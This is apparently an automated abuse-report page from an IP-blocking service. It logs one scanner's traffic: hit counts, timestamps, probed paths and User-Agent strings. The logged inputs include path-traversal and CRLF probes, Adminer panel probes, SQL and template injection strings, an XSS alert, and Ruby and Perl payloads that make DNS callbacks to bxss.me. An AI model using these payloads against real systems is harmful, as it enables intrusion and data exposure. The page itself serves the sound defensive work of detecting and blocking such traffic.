abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 188
- Unique targets hit
- 6
- Unique paths probed
- 1,555
- Detection count
- 12
- First seen
- 2026-07-04 14:29:07 UTC
- Last seen
- 2026-07-04 14:42:26 UTC
- Block expires
- 2026-07-05 15:28:21 UTC
Sample paths probed
- /4215949504
- /api/v1/settings
- /jkstatus;a
- /sQD1CWmS
- /_adminer.php
- /knf9P2yd
- /adminer-4.3.0-mysql-en.php
- /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells
- /?opYZ={BkpR}&RnkZ=<>
- /vgmg3hub1t73.html
- /vgmg3hub1t73.php
- /
- /1PsxPgKkHH.jsp
- /vgmg3hub1t73.jsp
- /%0a.example.com
- /apisix/admin/services/
- /adminer-4.3.0-mysql.php
- /xyVvSDAMjoX0QmG5
- /vgmg3hub1t73
- /ad.php
Sample User-Agents
- 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'ð¡
- bxss.me/t/xss.html?%00
- "+"A".concat(70-3).concat(22*4).concat(108).concat(80).concat(114).concat(65)+(require"socket" Socket.gethostbyname("hitbe"+"xsltwyupbc797.bxss.me.")[3].to_s)+"
- )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
- ${9999398+9999536}
- )
- '.gethostbyname(lc('hitlv'.'qjsyfypa7c2b2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(86).chr(119).chr(85).'
- <!--
- Nacos-Server
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
- ".gethostbyname(lc("hitpj"."dswdzxsf06a35.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(72).chr(109).chr(67)."
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36<esi:include src="http://bxss.me/rpb.png"/>
- Slackbot-LinkExpanding 1.0 (+https://api.slack.com/robots)
- gethostbyname(lc('hitlf'.'fqqfakxi89008.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(69).chr(102).chr(88)
- HttP://bxss.me/t/xss.html?%00
- 1C3Z33770
- <script>alert(12345)</script>
- Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4201.0 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
- Report Runner
- '"
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse — typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.